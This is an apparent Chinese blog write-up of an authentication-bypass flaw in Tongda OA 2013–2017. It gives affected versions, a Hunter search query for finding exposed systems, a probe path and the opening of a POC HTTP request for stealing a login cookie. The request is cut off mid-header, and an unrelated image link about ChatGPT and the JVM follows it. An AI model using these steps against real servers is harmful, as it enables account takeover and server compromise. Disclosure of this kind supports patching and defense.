一、漏洞简介
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA 2013-通达OA2017存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
二、影响版本
● 通达OA2013、通达OA2016、通达OA2017
三、资产测绘
● hunter:app.name="通达 OA"
● 登录页面
四、漏洞复现
-
访问
/module/retrieve_pwd/header.inc.php,响应为200表示可能存在漏洞
-
通过
POC获取cookie
POST /module/retrieve_pwd/header.inc.php HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,applicatio
![[AIGC] 利用 chatgpt 深入理解 Java 虚拟机(JVM)](https://img-blog.csdnimg.cn/direct/f65bcce204f74a059d2506c6f765429f.png)
